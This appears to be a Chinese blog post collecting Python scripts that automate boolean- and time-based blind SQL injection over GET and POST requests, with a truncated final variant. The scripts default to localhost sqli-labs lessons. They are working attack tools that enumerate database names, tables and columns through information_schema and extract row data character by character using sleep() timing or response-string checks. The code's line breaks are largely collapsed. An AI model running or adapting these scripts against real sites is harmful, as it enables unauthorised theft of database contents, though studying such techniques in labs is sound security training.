Python脚本-时间盲注

BlindBool_get

import requests
from optparse import OptionParser
import threading#存放变量
DBName = ""
DBTables = []
DBColumns = []
DBData = {}
flag = 'You are in'
#设置重连次数以及将连接改为短连接
#防止因为HTTP连接数过多导致的MAX retries exceeded with url问题
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = Falsedef GetDBName(url):#引用全局变量DBName,用来存放数据库名global DBNameprint('[*]开始获取数据库名长度')#保存数据库名长度的变量DBNameLen = 0#检查数据库名的长度的payloadpayload1 = "' and if(length(database())={0},1,0) --+"targetUrl = url + payload1for DBNameLen in range(1,99):res = conn.get(targetUrl.format(DBNameLen))if flag in res.content.decode("utf-8"):print("[*] 数据库名长度:" + str(DBNameLen))breakprint("[*]开始获取数据库名")payload1 = "' and if(ascii(substr(database(),{0},1))={1},1,0) --+"targetUrl = url+payload1for a in range(1,DBNameLen+1):for item in range(33,128):res = conn.get(targetUrl.format(a,item))if flag in res.content.decode('utf-8'):DBName += chr(item)print("[*]"+DBName)breakdef GetDBTables(url,dbname):global DBTablesDBTableCount = 0print("[*] 开始获取{0}数据库表数量:".format(dbname))#获取表名数量的payloadpayload2 = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) --+"targetUrl = url + payload2for DBTableCount in range(1,100):res = conn.get(targetUrl.format(dbname,DBTableCount))if flag in res.content.decode("utf-8"):print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))breakprint("[*] 开始获取{0}数据库中的表名".format(dbname))tableLen = 0for a in range(0,DBTableCount):print("[*] 正在获取第{0}个表名".format(a+1))#获取当前表名的长度for tableLen in range(1,99):payload2 = "' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) --+"targetUrl = url + payload2res = conn.get(targetUrl.format(dbname,a,tableLen))if flag in res.content.decode("utf-8"):break#开始获取表名#临时存放当前表名的变量table = ""#b表示当前表名猜的位置for b in range(1,tableLen+1):payload2 = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) --+"targetUrl = url + payload2for c in range(33,128):res = conn.get(targetUrl.format(dbname,a,b,c))if flag in res.content.decode('utf-8'):table += chr(c)print(table)break#把获取到的表名加入DBTablesDBTables.append(table)#清空table,用来获取下一个表名table = ''def GetDBColumns(url,dbname,dbtable):global DBColumnsDBColumnCount = 0#获取字段数量的payloadprint("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(0,99):payload3 = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) --+"targetUrl = url + payload3res = conn.get(targetUrl.format(dbname,dbtable,DBColumnCount))if flag in res.content.decode('utf-8'):print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))break#得到字段数量后开始获取字段名columns = ''for a in range(0,DBColumnCount):print("正在获取第{0}个字段的长度和名称:".format(a+1))#获取长度for columnLen in range(0,99):payload3 = "' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) --+"targetUrl = url + payload3res = conn.get(targetUrl.format(dbname,dbtable,a,columnLen))if flag in res.content.decode('utf-8'):break#b标志字段中位置for b in range(0,columnLen+1):payload3 = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) --+"targetUrl = url + payload3for c in range(33,128):res = conn.get(targetUrl.format(dbname,dbtable,a,b,c))if flag in res.content.decode('utf-8'):columns += chr(c)print(columns)break#获取到的字段放入DBColumnsDBColumns.append(columns)columns = ''# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "'and if ((select count({0}) from {1})={2},1,0) --+"targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))if flag in res.content.decode("utf-8"):print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "'and if ((select length({0}) from {1} limit {2},1)={3},1,0) --+"targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))if flag in res.content.decode("utf-8"):print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "'and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) --+"targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))if flag in res.content.decode("utf-8"):data += chr(c)print(data)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data)print(DBData)#把data清空来,继续获取下一个数据data = ""# 盲注主函数
def StartSqli(url):GetDBName(url)print("[+]当前数据库名:{0}".format(DBName))GetDBTables(url,DBName)print("[+]数据库{0}的表如下:".format(DBName))for item in range(len(DBTables)):print("(" + str(item + 1) + ")" + DBTables[item])tableIndex = int(input("[*]请输入要查看表的序号:")) - 1GetDBColumns(url,DBName,DBTables[tableIndex])while True:print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))for item in range(len(DBColumns)):print("(" + str(item + 1) + ")" + DBColumns[item])columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1if(columnIndex == -1):breakelse:GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])if __name__ == "__main__":try:usage = "./BlindBool_get.py -u url"parser = OptionParser(usage)parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-8/?id=1',help='设置目标url')options,args=parser.parse_args()url = options.url# StartSqli(options.url)threadSQL = threading.Thread(target=StartSqli,args=(url,))threadSQL.start()except KeyboardInterrupt:print('Interrupted by keyboard inputting!!!')

BlindBool_post

import requests
from optparse import OptionParser
import threading#存放变量
DBName = ""
DBTables = []
DBColumns = []
DBData = {}
flag = 'flag'
#设置重连次数以及将连接改为短连接
#防止因为HTTP连接数过多导致的MAX retries exceeded with url问题
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = Falsedef GetDBName(url):#引用全局变量DBName,用来存放数据库名global DBNameprint('[*]开始获取数据库名长度')#保存数据库名长度的变量DBNameLen = 0#检查数据库名的长度的payload# payload1 = "' and if(length(database())={0},1,0) #"for DBNameLen in range(1,99):payload = "admin' and if(length(database())="+str(DBNameLen)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):print("[*] 数据库名长度:" + str(DBNameLen))breakprint("[*]开始获取数据库名")for a in range(1,DBNameLen+1):for item in range(33,128):payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(item)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode('utf-8'):DBName += chr(item)print("[*]"+DBName)breakdef GetDBTables(url,dbname):global DBTablesDBTableCount = 0print("[*] 开始获取{0}数据库表数量:".format(dbname))#获取表名数量的payload# payload2 = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) #"for DBTableCount in range(1,100):payload = "admin' and if((select count(*)table_name from information_schema.tables where table_schema='"+dbname+"')="+str(DBTableCount)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))breakprint("[*] 开始获取{0}数据库中的表名".format(dbname))tableLen = 0for a in range(0,DBTableCount):print("[*] 正在获取第{0}个表名".format(a+1))#获取当前表名的长度for tableLen in range(1,99):payload = "admin' and if((select LENGTH(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):break#开始获取表名#临时存放当前表名的变量table = ""#b表示当前表名猜的位置for b in range(1,tableLen+1):for c in range(33,128):payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode('utf-8'):table += chr(c)print(table)break#把获取到的表名加入DBTablesDBTables.append(table)#清空table,用来获取下一个表名table = ''def GetDBColumns(url,dbname,dbtable):global DBColumnsDBColumnCount = 0#获取字段数量的payloadprint("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(0,99):payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode('utf-8'):print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))break#得到字段数量后开始获取字段名columns = ''for a in range(0,DBColumnCount):print("正在获取第{0}个字段的长度和名称:".format(a+1))#获取长度for columnLen in range(0,99):payload = "admin' and if((select LENGTH(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode('utf-8'):break#b标志字段中位置for b in range(0,columnLen+1):for c in range(33,128):payload = "admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode('utf-8'):columns += chr(c)print(columns)break#获取到的字段放入DBColumnsDBColumns.append(columns)columns = ''# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "admin' and if ((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "admin' and if ((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data1 = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "admin' and if (ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):data1 += chr(c)print(data1)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data1)print(DBData)#把data清空来,继续获取下一个数据data1 = ""# 盲注主函数
def StartSqli(url):GetDBName(url)print("[+]当前数据库名:{0}".format(DBName))GetDBTables(url,DBName)print("[+]数据库{0}的表如下:".format(DBName))for item in range(len(DBTables)):print("(" + str(item + 1) + ")" + DBTables[item])tableIndex = int(input("[*]请输入要查看表的序号:")) - 1GetDBColumns(url,DBName,DBTables[tableIndex])while True:print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))for item in range(len(DBColumns)):print("(" + str(item + 1) + ")" + DBColumns[item])columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1if(columnIndex == -1):breakelse:GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])if __name__ == "__main__":try:usage = "./BlindBool_post.py -u url"parser = OptionParser(usage)parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-15',help='设置目标url')options,args=parser.parse_args()url = options.url# StartSqli(options.url)threadSQL = threading.Thread(target=StartSqli,args=(url,))threadSQL.start()except KeyboardInterrupt:print('Interrupted by keyboard inputting!!!')

BlindTime_get

#!/usr/bin/python3
# -*- coding: utf-8 -*-import requests
from optparse import OptionParser
import time
import threading# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False# 盲注主函数
def StartSqli(url):GetDBName(url)print("[+]当前数据库名:{0}".format(DBName))GetDBTables(url,DBName)print("[+]数据库{0}的表如下:".format(DBName))for item in range(len(DBTables)):print("(" + str(item + 1) + ")" + DBTables[item])tableIndex = int(input("[*]请输入要查看表的序号:")) - 1GetDBColumns(url,DBName,DBTables[tableIndex])while True:print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))for item in range(len(DBColumns)):print("(" + str(item + 1) + ")" + DBColumns[item])columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1if(columnIndex == -1):breakelse:GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])# 获取数据库名函数
def GetDBName(url):# 引用全局变量DBName,用来存放网页当前使用的数据库名global DBNameprint("[-]开始获取数据库名长度")# 保存数据库名长度变量DBNameLen = 0# 用于检查数据库名长度的payloadpayload = "' and if(length(database())={0},sleep(5),0) --+"# 把URL和payload进行拼接得到最终的请求URLtargetUrl = url + payload# 用for循环来遍历请求,得到数据库名长度for DBNameLen in range(1, 99):# 开始时间timeStart = time.time()# 开始访问res = conn.get(targetUrl.format(DBNameLen))# 结束时间timeEnd = time.time()# 判断时间差if timeEnd - timeStart >= 5:print("[+]数据库名长度:" + str(DBNameLen))breakprint("[-]开始获取数据库名")payload = "' and if(ascii(substr(database(),{0},1))={1},sleep(5),0)--+"targetUrl = url + payload# a表示substr()函数的截取起始位置for a in range(1, DBNameLen+1):# b表示33~127位ASCII中可显示字符for b in range(33, 128):timeStart = time.time()res = conn.get(targetUrl.format(a,b))timeEnd = time.time()if timeEnd - timeStart >= 5:DBName += chr(b)print("[-]"+ DBName)break#获取数据库表函数
def GetDBTables(url, dbname):global DBTables#存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))#获取数据库表数量的payloadpayload = "' and if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0) --+"targetUrl = url + payload#开始遍历获取数据库表的数量for DBTableCount in range(1, 99):timeStart = time.time()res = conn.get(targetUrl.format(dbname, DBTableCount))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0,DBTableCount):print("[-]正在获取第{0}个表名".format(a+1))# 先获取当前表名的长度for tableLen in range(1, 99):payload = "' and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbname, a, tableLen))timeEnd = time.time()if timeEnd - timeStart >= 5:break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen+1):payload = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)--+"targetUrl = url + payload# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()res = conn.get(targetUrl.format(dbname, a, b, c))timeEnd = time.time()if timeEnd - timeStart >= 5:table += chr(c)print(table)break#把获取到的名加入到DBTablesDBTables.append(table)#清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):payload = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbname, dbtable, DBColumnCount))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a+1))# 先获取字段的长度for columnLen in range(99):payload = "' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbname, dbtable, a, columnLen))timeEnd = time.time()if timeEnd - timeStart >= 5:break# b表示当前字段名猜解的位置for b in range(1, columnLen+1):payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0) --+"targetUrl = url + payload# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()res = conn.get(targetUrl.format(dbname, dbtable, a, b, c))timeEnd = time.time()if timeEnd - timeStart >= 5:column += chr(c)print(column)break# 把获取到的名加入到DBColumnsDBColumns.append(column)#清空column,用来继续获取下一个字段名column = ""# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "' and if((select count({0}) from {1})={2},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "'and  if((select length({0}) from {1} limit {2},1)={3},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "' and  if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))timeEnd = time.time()if timeEnd - timeStart >= 5:data += chr(c)print(data)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data)print(DBData)#把data清空来,继续获取下一个数据data = ""if __name__ == '__main__':try:usage = "./BlindTime_get.py -u url"parser = OptionParser(usage)# 目标URL参数-uparser.add_option('-u', '--url', dest='url',default='http://localhost/Less-9/?id=1', type='string',help='target URL')options, args = parser.parse_args()url = options.urlthreadSQL = threading.Thread(target=StartSqli,args=(url,))threadSQL.start()except KeyboardInterrupt:print("Interrupted by keyboard inputting!!!")

BlindTime_post

#!/usr/bin/python3
# -*- coding: utf-8 -*-import requests
from optparse import OptionParser
import time
import threading# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False# 获取数据库名函数
def GetDBName(url):# 引用全局变量DBName,用来存放网页当前使用的数据库名global DBNameprint("[-]开始获取数据库名长度")# 保存数据库名长度变量DBNameLen = 0# 用for循环来遍历请求,得到数据库名长度for DBNameLen in range(1, 99):# 开始时间timeStart = time.time()payload = "admin' and if(length(database())="+str(DBNameLen)+",sleep(5),0) #"# "admin' and if(length(database())=8,sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)# 结束时间timeEnd = time.time()# 判断时间差if timeEnd - timeStart >= 5:print("[+]数据库名长度:" + str(DBNameLen))breakprint("[-]开始获取数据库名")# a表示substr()函数的截取起始位置for a in range(1, DBNameLen+1):# b表示33~127位ASCII中可显示字符for b in range(33, 128):timeStart = time.time()payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(b)+",sleep(5),0)#"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data)timeEnd = time.time()if timeEnd - timeStart >= 5:DBName += chr(b)print("[-]"+ DBName)break#获取数据库表函数
def GetDBTables(url, dbname):global DBTables#存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))#开始遍历获取数据库表的数量for DBTableCount in range(1, 99):timeStart = time.time()payload = "admin' and if((select count(table_name) from information_schema.tables where table_schema='"+dbname+"' )="+str(DBTableCount)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0,DBTableCount):print("[-]正在获取第{0}个表名".format(a+1))# 先获取当前表名的长度for tableLen in range(1, 99):payload = "admin' and if((select length(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",sleep(5),0) #"timeStart = time.time()data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen+1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0)#"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:table += chr(c)print(table)break#把获取到的名加入到DBTablesDBTables.append(table)#清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a+1))# 先获取字段的长度for columnLen in range(99):payload = "admin' and if((select length(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# b表示当前字段名猜解的位置for b in range(1, columnLen+1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:column += chr(c)print(column)break# 把获取到的名加入到DBColumnsDBColumns.append(column)#清空column,用来继续获取下一个字段名column = ""# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "admin' and if((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "admin'and  if((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data1 = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "admin' and  if(ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.get(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:data1 += chr(c)print(data1)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data1)print(DBData)#把data清空来,继续获取下一个数据data1 = ""# 盲注主函数
def StartSqli(url):GetDBName(url)print("[+]当前数据库名:{0}".format(DBName))GetDBTables(url,DBName)print("[+]数据库{0}的表如下:".format(DBName))for item in range(len(DBTables)):print("(" + str(item + 1) + ")" + DBTables[item])tableIndex = int(input("[*]请输入要查看表的序号:")) - 1GetDBColumns(url,DBName,DBTables[tableIndex])while True:print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))for item in range(len(DBColumns)):print("(" + str(item + 1) + ")" + DBColumns[item])columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1if(columnIndex == -1):breakelse:GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])if __name__ == '__main__':try:usage = "./BlindTime_get.py -u url"parser = OptionParser(usage)# 目标URL参数-uparser.add_option('-u', '--url', dest='url',default='http://localhost/Less-15/', type='string',help='target URL')options, args = parser.parse_args()url = options.urlthreadSQL = threading.Thread(target=StartSqli,args=(url,))threadSQL.start()except KeyboardInterrupt:print("Interrupted by keyboard inputting!!!")

整体改动过的脚本Time-POST

修改的地方:

payload
data
添加了time.sleep(0.05)
default
修改时要注意间隔

#!/usr/bin/python3
# -*- coding: utf-8 -*-import requests
from optparse import OptionParser
import time
import threading# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False# 获取数据库名函数
def GetDBName(url):# 引用全局变量DBName,用来存放网页当前使用的数据库名global DBNameprint("[-]开始获取数据库名长度")# 保存数据库名长度变量DBNameLen = 0# 用for循环来遍历请求,得到数据库名长度for DBNameLen in range(1, 99):# 开始时间timeStart = time.time()payload = "if(length(database())=" + str(DBNameLen) + ",sleep(5),0)"# "admin' and if(length(database())=8,sleep(5),0) #"data = {'id': payload,}res = conn.post(url, data=data)# 结束时间timeEnd = time.time()# 判断时间差if timeEnd - timeStart >= 5:print("[+]数据库名长度:" + str(DBNameLen))breakprint("[-]开始获取数据库名")# a表示substr()函数的截取起始位置for a in range(1, DBNameLen + 1):# b表示33~127位ASCII中可显示字符for b in range(33, 128):time.sleep(0.05)timeStart = time.time()payload = "if(ascii(substr(database()," + str(a) + ",1))=" + str(b) + ",sleep(5),0)"data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:DBName += chr(b)print("[-]" + DBName)break# 获取数据库表函数
